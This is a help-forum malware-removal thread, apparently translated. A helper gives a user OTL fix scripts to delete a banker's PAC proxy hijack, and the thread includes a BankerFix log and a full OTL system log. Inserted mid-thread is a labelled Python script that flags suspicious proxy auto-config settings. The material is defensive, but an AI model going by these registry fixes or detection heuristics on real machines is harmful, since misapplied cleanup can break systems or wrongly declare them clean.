  • Copy and paste the content below into the box right after [image: 5369460409_ee749edc8e_m.jpg]

:OTL
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Int ernet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

:Commands
[reboot]

  • Click the button [image: 5370056394_358505935a_m.jpg]
  • When it restarts a window will appear; click Run;
  • Save (File > Save As) the log to the desktop under any name you like;
  • Post the contents of that log in your next reply.
  • Attention: if you close the log without saving it first, it will be gone.
  • Open OTL again and click the button [image: 5370056476_bf9f840a51_m.jpg]
  • Do not interrupt the scan under any circumstances;
  • When it finishes, OTL.txt will be generated;
  • Post this generated log too in your next reply.

Note: if you happen to lose the log after the computer restarts, you can find it in the folder C:\_OTL\Moved Files

Cheers :D


Good afternoon Diego.

This code made OTL freeze; it did not complete the command and did not restart the PC.

Here is the BankerFix log.

Thanks!

Manoel.

-------------------------------------------------------

BankerFix 3.5 VALKYRIE - Removedor de Bankers

Linha Defensiva | http://www.linhadefensiva.org

http://www.linhadefensiva.org/bankerfix/

-------------------------------------------------------

Data: 2013-12-05 - 18:18

-------------------------------------------------------

Lista de Definição: 2012-08-22-1 | CORE: 2012-08-22-6

=======================================================

Arquivo infectado detectado: C:\Install.exe

Arquivo infectado removido com sucesso!

----- Fim -------------------------


Dear manoelvalerio

Now try with this one:

:OTL
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

:Commands
[reboot]

Cheers :D

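The OTL fix in the two posts above removes a single registry value: the Internet Explorer AutoConfigURL pointing at file://C:\ProgramData\ppctrl.dat. That value is a proxy auto-configuration (PAC) setting, and a PAC file planted under ProgramData lets malware route selected sites through a proxy of its choosing, which is why the removal is the core of this cleanup. As an added example that is not part of this thread, of OTL or of BankerFix, the Python below parses OTL-style IE and Firefox proxy lines and flags PAC settings a responder should review. The sample lines are constructed from the ones in this log; the function names and the heuristics (non-HTTP(S) scheme, bare-IP host, Firefox in PAC mode with an empty URL) are my own assumptions, not behaviour of any tool.

```python
import re
from urllib.parse import urlparse

# Constructed sample: these lines mirror what OTL prints for the IE proxy
# settings and for Firefox prefs.js in the log posted in this thread.
SAMPLE_OTL_LINES = [
    'IE - HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings: "ProxyEnable" = 0',
    'IE - HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings: "AutoConfigURL" = file://C:\\ProgramData\\ppctrl.dat',
    'FF - prefs.js..network.proxy.autoconfig_url: ""',
    'FF - prefs.js..network.proxy.type: 2',
]

# OTL line shapes (assumed from the log format, not an official grammar).
IE_RE = re.compile(r'^IE - .*Internet Settings: "(?P<name>\w+)" = (?P<value>.*)$')
FF_RE = re.compile(r'^FF - prefs\.js\.\.(?P<name>network\.proxy\.[\w.]+): (?P<value>.*)$')


def pac_url_reason(url):
    """Return why a PAC URL deserves review, or None if it looks ordinary.

    Heuristics (assumptions): a legitimate enterprise PAC is fetched over
    HTTP(S) from a named host, so a file:// path or a bare IP address is
    the kind of value a banker drops in to hijack browser traffic.
    """
    parsed = urlparse(url.strip())
    if parsed.scheme not in ("http", "https"):
        return "PAC not served over HTTP(S)"
    host = parsed.hostname or ""
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        return "PAC served from a bare IP address"
    return None


def find_pac_hijack(lines):
    """Scan OTL IE/FF lines and return (browser, setting, value, reason) tuples."""
    findings = []
    ff_prefs = {}
    for line in lines:
        m = IE_RE.match(line)
        if m:
            name, value = m.group("name"), m.group("value").strip()
            if name == "AutoConfigURL" and value:
                reason = pac_url_reason(value)
                if reason:
                    findings.append(("IE", "AutoConfigURL", value, reason))
            continue
        m = FF_RE.match(line)
        if m:
            # prefs.js strings are quoted in the log; numbers are not.
            ff_prefs[m.group("name")] = m.group("value").strip().strip('"')
    # network.proxy.type 2 means "automatic proxy configuration URL" (PAC).
    if ff_prefs.get("network.proxy.type") == "2":
        url = ff_prefs.get("network.proxy.autoconfig_url", "")
        reason = "autoconfig_url is empty" if url == "" else pac_url_reason(url)
        if reason:
            findings.append(("FF", "network.proxy.autoconfig_url", url, reason))
    return findings


if __name__ == "__main__":
    for browser, setting, value, reason in find_pac_hijack(SAMPLE_OTL_LINES):
        print(f"[{browser}] {setting} = {value!r}: {reason}")
```

On the log in this thread the script reports the IE AutoConfigURL as a file:// PAC, the same value the OTL script deletes, and lists the Firefox PAC-mode setting with its empty URL only as something to review; an ordinary HTTP(S) PAC on a named host produces no finding.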

Good afternoon Diego.

I entered the new code into OTL, and the computer restarted normally.

Avast is no longer notifying me about the JS: Banker threat. Could everything be clean now?

Here is the OTL log.

Thank you for your effort. Cheers!

OTL logfile created on: 08/12/2013 12:25:48 - Run 3

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.11.9600.16428)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 0,99 Gb Available Physical Memory | 49,39% Memory free

4,00 Gb Paging File | 2,65 Gb Available in Paging File | 66,41% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 101,97 Gb Free Space | 43,82% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

PRC - [2013/11/08 22:36:33 | 003,568,312 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastUI.exe

PRC - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe

PRC - [2012/11/23 00:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe

PRC - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) -- C:\Arquivos de Programas\Software Plate\svcgdp.exe

PRC - [2011/02/25 03:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe

PRC - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Modules (No Company Name) ==========

MOD - [2013/12/04 00:48:04 | 000,399,312 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll

MOD - [2013/12/04 00:48:03 | 013,586,896 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll

MOD - [2013/12/04 00:48:02 | 004,055,504 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\pdf.dll

MOD - [2013/12/04 00:47:11 | 000,702,416 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\libglesv2.dll

MOD - [2013/12/04 00:47:11 | 000,099,792 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\libegl.dll

MOD - [2013/12/04 00:47:08 | 001,619,408 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll

MOD - [2013/10/21 14:12:35 | 019,336,120 | ---- | M] () -- C:\Arquivos de Programas\AVAST Software\Avast\libcef.dll

MOD - [2011/03/17 00:11:16 | 004,297,568 | ---- | M] () -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Arquivos de Programas\Microsoft Office\Office14\1033\GrooveIntlResource.dll

MOD - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Services (SafeList) ==========

SRV - [2013/12/05 01:14:53 | 000,108,032 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\IEEtwCollector.exe -- (IEEtwCollectorService)

SRV - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2013/10/09 00:56:37 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013/10/05 22:41:26 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013/06/21 11:57:12 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2013/05/27 02:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) [Auto | Running] -- C:\Arquivos de Programas\Software Plate\svcgdp.exe -- (svcgdp)

SRV - [2010/12/27 23:50:30 | 031,124,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)

SRV - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose)

SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc)

SRV - [2003/04/18 20:06:26 | 000,008,192 | ---- | M] () [Disabled | Stopped] -- C:\Windows\System32\srvany.exe -- (KMService)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\tsusbhub.sys -- (tsusbhub)

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\synth3dvsc.sys -- (Synth3dVsc)

DRV - [2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)

DRV - [2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV - [2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2013/10/21 14:12:37 | 000,178,304 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)

DRV - [2013/10/21 14:12:37 | 000,079,720 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)

DRV - [2013/10/21 14:12:37 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)

DRV - [2012/09/15 16:59:31 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)

DRV - [2012/08/23 12:44:32 | 000,014,848 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV - [2012/08/23 12:40:25 | 000,049,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV - [2010/11/20 10:30:15 | 000,175,360 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus)

DRV - [2010/11/20 10:30:15 | 000,040,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt)

DRV - [2010/11/20 10:30:15 | 000,028,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc)

DRV - [2010/11/20 07:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)

DRV - [2010/11/20 07:14:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID)

DRV - [2010/11/20 07:14:41 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap)

DRV - [2009/07/13 21:45:33 | 000,083,456 | ---- | M] (Brother Industries Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\serial.sys -- (Serial)

DRV - [2009/07/13 20:09:17 | 004,194,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)

DRV - [2009/07/13 20:02:50 | 000,211,456 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\e1e6032.sys -- (e1express)

DRV - [2005/02/11 11:19:20 | 000,055,216 | ---- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\k750bus.sys -- (k750bus)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.google.com

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKLM\..\SearchScopes,DefaultScope =

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 93 66 3B FF A9 7E CC 01 [binary data]

IE - HKCU\..\SearchScopes,DefaultScope = {DB9BCD20-54F3-4A60-9865-B07BC3E63560}

IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\..\SearchScopes\{DB9BCD20-54F3-4A60-9865-B07BC3E63560}: "URL" = http://www.google.com/search?hl=en&q={searchTerms}&rlz=1I7GGNI_pt-BRBR507

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..network.proxy.autoconfig_url: ""

FF - prefs.js..network.proxy.http: ""

FF - prefs.js..network.proxy.type: 2

FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()

FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf: C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\daplinkchecker@speedbit.com: C:\Program Files\DAP\daplinkchecker [2013/02/10 01:00:56 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}: C:\Program Files\DAP\DAPFireFox [2013/02/10 01:00:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2012/10/05 20:47:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Extensions

[2013/11/23 15:59:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions

[2013/10/06 10:06:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

[2013/11/23 15:59:57 | 000,382,345 | ---- | M] () (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\firefox\profiles\1t2pwtzw.default\extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi

[2013/10/05 22:41:09 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\extensions

[2013/10/05 22:41:28 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2013/10/05 22:41:22 | 000,001,240 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\buscape.xml

[2013/10/05 22:41:22 | 000,001,425 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\mercadolivre.xml

[2013/10/05 22:41:22 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

[2013/10/05 22:41:22 | 000,001,381 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-br.xml

[2013/10/05 22:41:22 | 000,001,165 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-br.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.google.com

CHR - plugin: Widevine Content Decryption Module (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.1.376\_platform_specific\win_x86\widevinecdmadapter.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\pdf.dll

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

CHR - plugin: Foxit Reader Plugin for Mozilla (Disabled) = C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll

CHR - plugin: Java Deployment Toolkit 7.0.450.18 (Enabled) = C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll

CHR - plugin: Java Platform SE 7 U45 (Enabled) = C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Google Update (Enabled) = C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll

CHR - Extension: YouTube Center = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcegdpionpopahcglnfiiioapcclamdj\2.0.1_0\

CHR - Extension: James White = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\

CHR - Extension: DAP Link Checker = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh\1.0.1.8_0\

CHR - Extension: Download Accelerator Plus (DAP) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb\2.0.11_0\

CHR - Extension: Windows Media Player Extension for HTML5 = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\

CHR - Extension: Google Wallet = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\

O1 HOSTS File: ([2013/12/05 18:20:00 | 000,000,822 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de Programas\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de Programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (SpeedBit Link Verification Helper) - {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Arquivos de Programas\DAP\LinkVerifier.dll (Speedbit Ltd.)

O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de Programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [20131121] C:\Program Files\AVAST Software\Avast\setup\emupdate\2b520615-d68a-4492-a5e4-39b59408a272.exe (AVAST Software)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)

O4 - HKCU..\Run: [F.lux] C:\Users\2011\Local Settings\Apps\F.lux\flux.exe ()

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: &Download with &DAP - C:\Arquivos de Programas\DAP\dapextie.htm ()

O8 - Extra context menu item: &Verify with DAP - C:\Arquivos de Programas\DAP\dapverify.htm ()

O8 - Extra context menu item: Download &all with DAP - C:\Arquivos de Programas\DAP\dapextie2.htm ()

O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 1.6.0_30)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439}: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

